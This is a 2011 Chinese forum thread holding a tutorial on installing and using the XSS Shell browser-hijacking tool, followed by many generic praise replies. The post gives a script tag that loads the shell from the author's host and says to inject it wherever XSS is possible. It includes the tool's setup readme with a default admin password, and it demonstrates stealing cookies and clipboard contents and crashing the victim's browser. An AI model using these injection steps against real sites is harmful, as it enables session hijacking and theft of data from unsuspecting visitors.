思步网

标题: XSS SHELL的安装和使用 [打印本页]

作者: bzcyer 时间: 2011-3-9 11:01
标题: XSS SHELL的安装和使用
本帖最后由 bzcyer 于 2011-3-9 11:04 编辑

@author Bzcyer

@ http://www.bzcyer.com/

1.安装
使用的是XSS Shell 0.38版『XSSShell038.zip』，最初用『xssshell-xsstunnell.zip』里面的『XSSShell - v0.6.2』，后台只能看到Commands，看不到Victims和Logs，没弄明白为什么。关于环境，在本机IIS上，不能用，所以传到博客上。
管理地址：http://www.bzcyer.com/xss2/xssshell/default.asp
Sapmle Victim：http://www.bzcyer.com/xss2/sample%5Fvictim/
<script src="http://www.bzcyer.com/xss2/xssshell.asp?v=336699"></script>
配置文件看下面，参考压缩包中的readme.txt，比较简单就不说了。

Install Admin Interface;
1. Copy "xssshell" folder into your web server
2. Copy "db" to a secure place (below root)
3. Configure "database path" from "xssshell/db.asp"
4. Modify hard coded password in db.asp [default password is : w00t]
5. Now you can access admin interface from something like [url=http://[yourhost]/xssshell/]http://[YOURHOST]/xssshell/[/url]

Configure XSS Shell for communication;
1. Open xssshell.asp
2. Set "SERVER" variable to where your XSSShell folder is located. i.e: "[url=http://[yourhost]/xssshell/]http://[YOURHOST]/xssshell/[/url]";
3. Be sure to check "ME", "CONNECTOR", "COMMANDS_URL" variables. If you changed filenames, folder names or some kind of different configuration you need modify them.
Now open your admin interface from your browser,
To test it, just modify "sample_victim/default.asp" source code and replace "http://attacker:81/release/xssshell.js" URL with your own XSS Shell URL. Open "sample_victim" folder in some other browser and may be upload in to some other server.
Now you should see a zombie in admin interface. Just write something into "parameters" textarea and click "alert()". You should see an alert message in victim's browser.

2.使用

首先把特定的脚本<script src="http://www.bzcyer.com/xss2/xssshell.asp?v=336699"></script>放到需要控制的页面，能写进XSS的地方应该都可以。在这里测试的话，用了XSS Shell自带的一个sample。
打开http://www.bzcyer.com/xss2/sample%5Fvictim/，脚本<script src="http://www.bzcyer.com/xss2/xssshell.asp?v=336699"></script>放到default.asp文件中。当有人打开页面的时候，可以在XSS Shell『http://www.bzcyer.com/xss2/xssshell/default.asp』里看到以下信息：

简单的用一下这些功能：
1.getCookie( )

2.alert(<message>) Parameters : 设置为“哈哈～还有其他更有意思的”

3.getClipboard()
复制下『copy from Clipboadr from www.bzcyer.com』，执行getClipboard()

4.Crash()
这个就不试了，用了这个命令，那IE就会直接死掉

当然也可以自己写一些JS，可以做很多事情。。

作者: 微博评论 时间: 2011-3-9 15:26
顶，加油。

来自漂在生活的新浪微博

作者: wentyfong 时间: 2013-3-30 15:00
众里寻他千百度，蓦然回首在这里！

作者: Mesimix 时间: 2013-4-12 10:00
前排支持下了哦~

作者: 惊醒幡然 时间: 2014-4-26 19:12
看起来不错

作者: 后悔有药 时间: 2014-7-7 19:51
鼎力支持！！

作者: 把眼泪擦干ii 时间: 2014-8-8 16:32
这么强,支持楼主，佩服

作者: ◆◇笙歌叹离愁 时间: 2014-8-20 18:30
有空一起交流一下。

作者: 心的憧憬 时间: 2014-8-28 07:23
确实不错，顶先

作者: 〃小宝、 时间: 2014-10-18 17:37
顶不错支持下

作者: 般嘚芳香、 时间: 2014-10-23 07:43
路过帮顶嘿嘿

作者: 稚初. 时间: 2014-12-18 17:46
very good.

作者: ミ曲线﹏ 时间: 2014-12-21 16:11
不错支持一个了

作者: 救生圈 时间: 2015-1-5 18:11
向楼主学习

作者: 寻她人 时间: 2015-4-24 21:11
非常好，顶一下占位编辑

作者: 别低头 时间: 2015-5-13 16:44
有空一起交流一下。

作者: 岛屿失梦 时间: 2015-5-24 17:56
不错支持一个了

作者: 风之引力 时间: 2015-5-25 19:11
看了LZ的帖子，我只想说一句很好很强大！

作者: 劳资就是小清新 时间: 2015-6-28 10:20
很有借鉴意义，先收藏了，谢谢楼主。

作者: 不做帝王妾 时间: 2015-7-23 22:56
路过帮顶嘿嘿

作者: 我们再爱一遍丶 时间: 2015-8-12 18:10
学习下我只是路过，不发表意见……

作者: 李珊 时间: 2015-9-18 11:25
前排支持下了哦~

作者: 道拉格斯 时间: 2016-7-1 16:22
这么强,支持楼主，佩服

作者: 冷眸ゞ 时间: 2016-7-30 15:17
确实不错，顶先

作者: ︶烟花散尽 时间: 2016-7-31 14:13
路过的帮顶

作者: 花心筒 时间: 2016-9-10 09:15
好帖是需要鼓励的~

作者: 灬花落 时间: 2016-9-11 18:52
没人回帖。。。我来个吧！

作者: 北船余音 时间: 2016-10-19 11:50
前排支持下了哦~

作者: 海沫深@ 时间: 2016-12-25 22:42
不错支持一个了

作者: 喘生@ 时间: 2017-1-15 21:00
鼎力支持！！

作者: 水木 时间: 2017-3-29 12:20
好帖是需要鼓励的~

作者: 低头不是认输@ 时间: 2017-7-20 10:51
前排支持下了哦~

作者: 抚涟i 时间: 2017-9-5 22:55
顶不错支持下

作者: 清泊 时间: 2017-11-24 18:17
有空一起交流一下。

作者: 黄的笔记 时间: 2018-5-3 22:22
支持，赞一个

作者: 够钟！ 时间: 2018-7-3 13:38
鼎力支持！！

作者: 我命本喜 时间: 2018-7-9 09:52
非常好，顶一下占位编辑

作者: 瑹歌 时间: 2018-7-16 21:03
没人回帖。。。我来个吧！

作者: 感情洁癖者i 时间: 2018-7-27 17:36
不错支持一个了

作者: 没有你的爱 时间: 2018-7-28 14:36
very good.

作者: 魅╰美。 时间: 2018-9-4 21:04
不错支持一个了

作者: 彼岸蔷薇 时间: 2018-10-24 14:54
我了个去，顶了

作者: 黛尽青丝@ 时间: 2018-10-27 15:17
不错支持一个了

作者: 孤岛 时间: 2018-12-26 10:15
很有借鉴意义，先收藏了，谢谢楼主。

作者: 温暖忧伤 时间: 2019-1-7 10:02
很有借鉴意义，先收藏了，谢谢楼主。

作者: 、唱忐忑 时间: 2019-1-23 11:28
鼎力支持！！

作者: 永远的蔷薇 时间: 2019-3-2 16:25
好帖是需要鼓励的~

作者: 入花庭 时间: 2019-4-10 11:39
very good.

作者: 龟兔 时间: 2019-6-12 10:07
确实不错，顶先

作者: 班尼路 时间: 2019-7-23 11:33
确实不错，顶先

作者: 海内比邻 时间: 2019-8-3 15:04
向楼主学习

作者: 森迷@ 时间: 2019-8-4 09:05
看了LZ的帖子，我只想说一句很好很强大！

作者: 友情保质期i 时间: 2019-9-21 21:06
前排支持下了哦~

作者: 掐死时间 时间: 2019-10-12 07:53
前排支持下了哦~

作者: 梦慌° 时间: 2019-10-14 07:29
向楼主学习

作者: 源泉 时间: 2019-10-17 11:56
好帖是需要鼓励的~

作者: 深海苏眉鱼 时间: 2020-1-2 20:22
前排支持下了哦~

作者: 漫长的青春。 时间: 2020-3-3 10:08
以我的经验来看，楼主的想法是可以执行的~

作者: 人亦已歌 时间: 2020-4-8 20:12
好帖是需要鼓励的~

作者: 迷惑 时间: 2020-4-16 13:45
看起来好像不错的样子

作者: 安然 时间: 2020-5-6 14:02
向楼主学习

作者: 奢求 时间: 2020-9-25 12:01
看了LZ的帖子，我只想说一句很好很强大！

作者: 阿旺 时间: 2020-10-20 15:43
学习下我只是路过，不发表意见……

作者: 六角星 时间: 2021-1-24 12:56
很有借鉴意义，先收藏了，谢谢楼主。

作者: 笑泪-- 时间: 2021-3-1 14:20
其实，很多情况下都是这样的，习惯就好。

欢迎光临思步网 (http://www.step365.com/)